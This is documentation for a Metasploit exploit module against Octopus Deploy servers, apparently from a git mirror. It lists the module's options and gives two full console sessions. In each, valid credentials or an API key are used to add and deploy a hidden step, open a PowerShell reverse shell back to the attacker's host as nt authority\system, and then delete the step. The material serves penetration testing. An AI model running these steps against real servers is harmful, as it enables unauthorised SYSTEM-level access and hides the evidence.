adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
fc3b08fb8b97539d016878eb774df28362c444e3
metasploit-gs/documentation/modules/exploit/windows/http/octopusdeploy_deploy.md
T

147 lines
5.0 KiB
Markdown
Raw Blame History

## Vulnerable Application
[Install Octopus Deploy server](https://octopus.com/docs/getting-started#Gettingstarted-InstalltheOctopusserver)
[Create a test user/team](https://octopus.com/docs/administration/managing-users-and-teams) - Team should have "Project contributor" and "Project deployer", or just "System administrator" and add your test user.
[Create an API key](https://octopus.com/docs/how-to/how-to-create-an-api-key)
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: ```use exploit/windows/http/octopusdeploy_deploy```
4. Do: set ```PATH```, ```RHOST```, ```RPORT```, and ```SSL``` if needed
5. Do: set ```STEPNAME``` if desired
6. Do: set ```USERNAME``` and ```PASSWORD``` or just ```APIKEY```
7. Do: ```run```
8. You should get a shell.
## Options
**APIKEY**
API key, which can be generated within the Octopus Deploy application. Can be used instead of a username/password combination.
**USERNAME**
Username of the Octopus Deploy user.
**PASSWORD**
Password of the Octopus Deploy user.
**PATH**
Path to the Octopus Deploy instance. For example, if you sign in to "https://example.com/octopus/app", the value should be "/octopus".
**STEPNAME**
Name of the step to be added to a deployment. This may be visible in the application for a short period of time. A random value will be generated if no value is provided.
**SSL**
Enables or disables SSL. Octopus Deploy server can be configured to listen for HTTP or HTTPS traffic.
## Scenarios
### Octopus Deploy Server 3.16.0
Getting a privileged shell on Octopus Deploy server using administrative credentials.
```
msf > use exploit/windows/http/octopusdeploy_deploy
msf exploit(octopusdeploy_deploy) > set PATH /octoADTest
PATH => /octoADTest
msf exploit(octopusdeploy_deploy) > set USERNAME ODUser
USERNAME => ODUser
msf exploit(octopusdeploy_deploy) > set PASSWORD Password1
PASSWORD => Password1
msf exploit(octopusdeploy_deploy) > set RHOST 10.0.0.12
RHOST => 10.0.0.12
msf exploit(octopusdeploy_deploy) > set RPORT 80
RPORT => 80
msf exploit(octopusdeploy_deploy) > set payload windows/powershell_reverse_tcp
payload => windows/powershell_reverse_tcp
msf exploit(octopusdeploy_deploy) > set LHOST 10.0.0.7
LHOST => 10.0.0.7
msf exploit(octopusdeploy_deploy) > run
[*] Started reverse SSL handler on 10.0.0.7:4444
[*] Getting available projects
[*] Using project TestProject2
[*] Getting steps to TestProject2
[*] Adding step r4XAJc to TestProject2
[*] Getting available channels
[*] Using channel Default
[*] Getting next version
[*] Using version 0.0.2
[*] Creating release
[*] Release Releases-79 created
[*] Deploying TestProject2 version 0.0.2 to TestEnv
[*] Getting updated steps to TestProject2
[*] Deleting step r4XAJc from TestProject2
[*] Step r4XAJc deleted
[*] Powershell session session 1 opened (10.0.0.7:4444 -> 10.0.0.12:59346) at 2017-05-15 19:54:01 -0500
Windows PowerShell running as user WIN-OL1HR5KBTPD$ on WIN-OL1HR5KBTPD
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Octopus\ADTest\Work\20170516025358-22>whoami
nt authority\system
PS C:\Octopus\ADTest\Work\20170516025358-22> exit
[*] 10.0.0.12 - Powershell session session 1 closed. Reason: Died from Errno::ECONNRESET
msf exploit(octopusdeploy_deploy) >
```
Getting a privileged shell on Octopus Deploy server using a sufficiently privileged API key.
```
msf > use exploit/windows/http/octopusdeploy_deploy
msf exploit(octopusdeploy_deploy) > set PATH /octoADTest
PATH => /octoADTest
msf exploit(octopusdeploy_deploy) > set RHOST 10.0.0.12
RHOST => 10.0.0.12
msf exploit(octopusdeploy_deploy) > set RPORT 80
RPORT => 80
msf exploit(octopusdeploy_deploy) > set payload windows/powershell_reverse_tcp
payload => windows/powershell_reverse_tcp
msf exploit(octopusdeploy_deploy) > set LHOST 10.0.0.7
LHOST => 10.0.0.7
msf exploit(octopusdeploy_deploy) > set APIKEY API-FCIQ773M43RKNC4I9KZHQTABC
APIKEY => API-FCIQ773M43RKNC4I9KZHQTABC
msf exploit(octopusdeploy_deploy) > set STEPNAME shell
STEPNAME => shell
msf exploit(octopusdeploy_deploy) > run
[*] Started reverse SSL handler on 10.0.0.7:4444
[*] Getting available projects
[*] Using project TestProject2
[*] Getting steps to TestProject2
[*] Adding step shell to TestProject2
[*] Getting available channels
[*] Using channel Default
[*] Getting next version
[*] Using version 0.0.3
[*] Creating release
[*] Release Releases-80 created
[*] Deploying TestProject2 version 0.0.3 to TestEnv
[*] Getting updated steps to TestProject2
[*] Deleting step shell from TestProject2
[*] Step shell deleted
[*] Powershell session session 1 opened (10.0.0.7:4444 -> 10.0.0.12:59373) at 2017-05-15 19:59:55 -0500
Windows PowerShell running as user WIN-OL1HR5KBTPD$ on WIN-OL1HR5KBTPD
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Octopus\ADTest\Work\20170516025952-24>whoami
nt authority\system
PS C:\Octopus\ADTest\Work\20170516025952-24> exit
[*] 10.0.0.12 - Powershell session session 1 closed. Reason: Died from Errno::ECONNRESET
msf exploit(octopusdeploy_deploy) >
```
Reference in New Issue View Git Blame Copy Permalink